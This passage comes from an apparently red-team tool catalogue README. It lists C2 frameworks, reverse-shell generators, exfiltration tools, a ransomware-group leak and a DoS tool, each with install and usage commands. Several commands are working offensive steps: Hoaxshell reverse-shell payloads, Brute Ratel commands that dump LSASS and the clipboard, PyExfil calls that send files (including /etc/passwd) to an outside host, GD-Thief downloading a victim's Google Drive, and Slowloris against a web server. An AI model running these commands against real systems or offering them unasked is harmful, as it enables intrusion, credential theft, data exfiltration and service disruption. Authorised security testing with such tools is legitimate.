information](https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation).\n\n![image](https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png)\n\n*Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots*\n\n### [πŸ”™](#tool-list)[Brute Ratel](https://bruteratel.com/)\n\nBruteRatel is a great command and control (C4) framework created by [@NinjaParanoid](https://twitter.com/NinjaParanoid). The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.\n\nThe client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.\n\nSome nice features:\n\n- DNS Over HTTPS\n- Indirect Syscalls\n- Built-in Debugger To Detect EDR Userland Hooks\n- MITRE graph integration\n- Adversary TTP automation\n\n**Install:** \n\nTo legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the [pricing page](https://bruteratel.com/pricing/) for more information.\n\nAfter purchase you can download the framework from [here](https://bruteratel.com/tabs/download/) with your Activation Key and License User ID.\n\n**Usage:** \n\n```bash\n# Loads a powershell script to memory which can be Invoked using psreflect\npsimport\n\n# Locks keyboard and mouse hardware input. Use β€˜unlock_input’ command to unlock\nlock_input\n\n# Dumps user clipboard\ndumpclip\n\n# Enumerates basic domain information\ndcenum\n\n# Elevates user privileges to SYSTEM (Requires admin rights)\nget_system\n\n# Takes a screenshot of current desktop and stores it on the server\nscreenshot\n\n# Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique\nshadowclone\n```\n\nFull commander terminal usage information can be found [here](https://bruteratel.com/tabs/badger/badgers/).\n\n![image](https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png)\n\n*Image used from https://bruteratel.com/*\n\n### [πŸ”™](#tool-list)[NimPlant](https://github.com/chvancooten/NimPlant)\n\nA light-weight first-stage C2 implant written in Nim.\n\nFeatures:\n\n- Lightweight and configurable implant written in the Nim programming language\n- Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts\n- Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables\n- Easy deployment of more advanced functionality or payloads via `inline-execute`, `shinject` (using dynamic invocation), or in-thread `execute-assembly`\n- Comprehensive logging of all interactions and file operations\n\n\n**Install:** \n\n```bash\ncurl https://nim-lang.org/choosenim/init.sh -sSf | sh\nchoosenim stable\ngit clone https://github.com/chvancooten/NimPlant\ncd client\nnimble install -d\npip3 install -r server/requirements.txt\napt install mingw-w64\n```\n\n**Usage:** \n\n```bash\n# Generate payloads\npython .\\NimPlant.py compile all\n\n# Start server\npython .\\NimPlant.py server \n```\n\nBefore running make sure to create the `config.tool` configuration file, more information can be found [here](https://github.com/chvancooten/NimPlant#getting-started).\n\nFull usage information can be found [here](https://github.com/chvancooten/NimPlant#usage).\n\n[Blog - Building a C2 Implant in Nim - Considerations and Lessons Learned](https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/)\n\n![image](https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png)\n\n*Image used from https://casvancooten.com*\n\n### [πŸ”™](#tool-list)[Hoaxshell](https://github.com/t3l3machus/hoaxshell)\n\nA Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.\n\n**Install:** \n\n```bash\ngit clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\n```\n\n**Usage:** \n\n```bash\n# Payload that utilizes Invoke-Expression (default)\nsudo python3 hoaxshell.py -s \u003cyour_ip\u003e\n\n# Payload that writes and executes commands from a file\nsudo python3 hoaxshell.py -s \u003cyour_ip\u003e -x \"C:\\Users\\\\\\$env:USERNAME\\.local\\hack.ps1\"\n\n# Encrypted shell session with a trusted certificate\nsudo python3 hoaxshell.py -s \u003cyour.domain.com\u003e -t -c \u003c/path/to/cert.pem\u003e -k \u003cpath/to/key.pem\u003e\n```\n\nFull usage documentation [here](https://github.com/t3l3machus/hoaxshell#usage).\n\n[Usage Demo - YouTube](https://www.youtube.com/watch?v=SEufgD5UxdU)\n\n[Hoaxshell vs AV](https://github.com/t3l3machus/hoaxshell#av-bypass-pocs)\n\n![image](https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png)\n\n*Image used from https://github.com/t3l3machus/hoaxshell*\n\nExfiltration\n====================\n\n### [πŸ”™](#tool-list)[Dnscat2](https://github.com/iagox86/dnscat2)\n\nA tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).\n\nThe tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.\n\n**Install: (Compile - Server)** \n\n```bash\ngit clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/server/\ngem install bundler\nbundle install\n```\n\n**Install: (Compile - Client)** \n\n```bash\ngit clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/client/\nmake\n```\n\nFull installation information can be found in the [Installation Section](https://github.com/iagox86/dnscat2#compiling).\n\n**Usage: (Server)** \n\n```bash\n# Establish the server\nruby ./dnscat2.rb DOMAIN.COM\n```\n\n**Usage: (Client)** \n\n```bash\n# Establish the client with authoritative domain\n./dnscat2 DOMAIN.COM\n\n# Establish the client without authoritative domain\n./dnscat2 --dns host=0.0.0.0,port=0000\n\n# Ping the server from the client\n./dnscat --ping DOMAIN.COM\n\n# Ping the server from the client, with custom dns resolver ip\n./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping\n```\n\n**Usage: (Tunnels)** \n\n```bash\n# (After establishing the client) You can open a new tunnelled port\nlisten [lhost:]lport rhost:rport\n\n# Forward ssh connections through the dnscat2 client to an internal device\nlisten 127.0.0.1:2222 10.10.10.10:22\n```\n\nFull usage information can be found in the [Usage Section](https://github.com/iagox86/dnscat2#usage). \n\n![image](https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png)\n\n### [πŸ”™](#tool-list)[Cloakify](https://github.com/TryCatchHCF/Cloakify)\n\nWhen exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.\n\nCloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.\n\n**Note:** You can make your own ciphers, see [here](https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers) for more info.\n\n**Install:** \n\n```bash\ngit clone https://github.com/TryCatchHCF/Cloakify\n```\n\n**Usage:** \n\n```bash\n# Cloakify some text\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u003e TEXT.cloaked\n\n# De-Cloakify the text\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png)\n\n![image](https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png)\n\n### [πŸ”™](#tool-list)[PyExfil](https://github.com/ytisf/PyExfil)\n\n\"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios.\"\n\n**Install:** \n\n```bash\ngit clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install\n```\n\n**Usage:** (Full Usage [here](https://github.com/ytisf/PyExfil/blob/master/USAGE.md))\n\n#### HTTP Cookies\n\n```python\nfrom pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen\n\n# For Client (exfil)\nsend_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)\n\n# For Server (collecting)\nlisten(local_addr='127.0.0.1', local_port=80)\n```\n\n#### ICMP Echo 8\n\n```python\nfrom pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener\n\n# For Client (exfil)\nip_addr = \"127.0.0.1\"\nsend_file(ip_addr, src_ip_addr=\"127.0.0.1\", file_path=\"\", max_packetsize=512, SLEEP=0.1)\n\n# For Server (collecting)\ninit_listener(ip_addr, saving_location=\"/tmp/\")\n```\n\n#### NTP Request\n\n```python\nfrom pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT\n\n# For Client (exfil)\nip_addr = \"127.0.0.1\"\nexfiltrate(\"/etc/passwd\", ip_addr, time_delay=0.1)\n\n# For Server (collecting)\nntp_listener(ip=\"0.0.0.0\", port=NTP_UDP_PORT)\n```\n\n![image](https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png)\n\n### [πŸ”™](#tool-list)[Powershell RAT](https://github.com/Viralmaniar/Powershell-RAT)\n\nPython based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.\n\n**Install:** \n\n```bash\ngit clone https://github.com/Viralmaniar/Powershell-RAT\n```\n\n**Usage:** (Full Usage [here](https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md))\n\n#### Setup\n\n- Throwaway Gmail address\n- Enable \"Allow less secure apps\" by going to https://myaccount.google.com/lesssecureapps\n- Modify the `$username` \u0026 `$password` variables for your account in the Mail.ps1 Powershell file\n- Modify `$msg.From` \u0026 `$msg.To.Add` with throwaway gmail address\n\n![image](https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png)\n\n### [πŸ”™](#tool-list)[GD-Thief](https://github.com/antman1p/GD-Thief)\n\nTool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.\n\nThis includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.\n\n**Install:** \n\n```bash\ngit clone https://github.com/antman1p/GD-Thief.git\ncd GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n```\n\nthen...\n\n1. Create a new Google Cloud Platform (GCP) project\n2. Enable a Google Workspace API\n3. Configure OAuth Consent screen\n4. Create a credential\n5. Add the victim's Google account to the Application's Test Users\n\nFor detailed setup instructions see the [How To Guide](https://github.com/antman1p/GD-Thief#how-to).\n\n**Usage:** \n\n```bash\nusage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u003cDICTIONARY FILE PATH\u003e]}\n\t[-t \u003cTHREAD COUNT\u003e]\n\nhelp:\n\nThis Module will connect to Google's API using an access token and exfiltrate files\nfrom a target's Google Drive. It will output exfiltrated files to the ./loot directory\n\narguments:\n -m [{dlAll, dlDict}],\n --mode [{dlAll, dlDict}]\n The mode of file download\n Can be \"dlAll\", \"dlDict [-d \u003cDICTIONARY FILE PATH\u003e]\", or... (More options to come)\n\noptional arguments:\n -d \u003cDICTIONARY FILE PATH\u003e, --dict \u003cDICTIONARY FILE PATH\u003e\n Path to the dictionary file. Mandatory with download mode\"-m, --mode dlDict\"\n You can use the provided dictionary, per example: \"-d ./dictionaries/secrets-keywords.txt\"\n -t \u003cTHREAD COUNT\u003e, --threads \u003cTHREAD COUNT\u003e\n Number of threads. (Too many could exceeed Google's rate limit threshold)\n\n -h, --help\n show this help message and exit\n```\n\nNice [blog post](https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557) explaining the logic behind the tool.\n\nImpact\n====================\n\n### [πŸ”™](#tool-list)[Conti Pentester Guide Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak)\n\nConti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks. \n\nConti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service. \n\nThe [Conti Pentester Guide Leak - Repository](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) contains leaked pentesting materials given to Conti ransomware group affilates.\n\nTopics include:\n\n- Configuring Rclone with MEGA for data exfiltration\n- Configuring AnyDesk as persistence and remote access into a victim’s network\n- Elevating and gaining admin rights inside a company’s hacked network\n- Taking over domain controllers\n- Dumping passwords from Active Directory\n\n**Note:** *[vx-underground.org](https://www.vx-underground.org/) obtained more training materials and tools used by Conti ransomware operators [here](https://share.vx-underground.org/Conti/).*\n\n![image](https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png)\n\n*Image used from https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak*\n\n### [πŸ”™](#tool-list)[SlowLoris](https://github.com/gkbrk/slowloris)\n\nSlowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests. \n\nThis attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.\n\n**Install: (Pip)** \n\n```bash\nsudo pip3 install slowloris\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/gkbrk/slowloris.git\ncd slowloris\n```\n\n**Usage:** \n\n```bash\n# Pip\nslowloris example.comr\n\n# Git\npython3 slowloris.py example.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png)\n\n### [πŸ”™](#tool-list)[usbkill](https://github.com/hephaest0s/usbkill)\n\nThis is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected.\n\nIn some situations, it is imperative that no data is added or removed from an endpoint via USB.\n\nThis is where USBkill comes in.\n\n**Install:** \n\n```\ngit clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\n```\n\n**Usage:** \n\n```bash\nsudo python3 usbkill.py\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png)\n\n*Image used from https://en.wikipedia.org/wiki/USBKill*\n\n### [πŸ”™](#tool-list)[Keytap](https://github.com/ggerganov/kbd-audio)\n\nThis is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone.\n\nKeytap2 can also be used to retrieve text from audio snippets of keyboard typing.\n\n**Install: (Build)** \n\n```\ngit clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026\u0026 cd build\ncmake ..\nmake\n```\n\n**Usage:**\n\n```bash\n# Record audio to a raw binary file on disk\n./record-full output.kbd [-cN]\n\n# Playback a recording captured via the record-full tool\n./play-full input.kbd [-pN]\n\n# Record audio only while typing (Useful for collecting training data for keytap)\n./record output.kbd [-cN] [-CN]\n```\n\nSee full usage documentation [here](https://github.com/ggerganov/kbd-audio#tool-details).\n\nTry the online demo at [https://keytap.ggerganov.com/](https://keytap.ggerganov.com/).\n\n![image](https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png)\n\n*Image used from https://github.com/ggerganov/kbd-audio*\n","funding_links":[],"categories":["Others","cheatsheet","HarmonyOS","windows","Pentesting","Misc"],"sub_categories":["Windows Manager","Red Team"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FA-poc%2FRedTeam-Tools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FA-poc%2FRedTeam-Tools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FA-poc%2FRedTeam-Tools/lists"}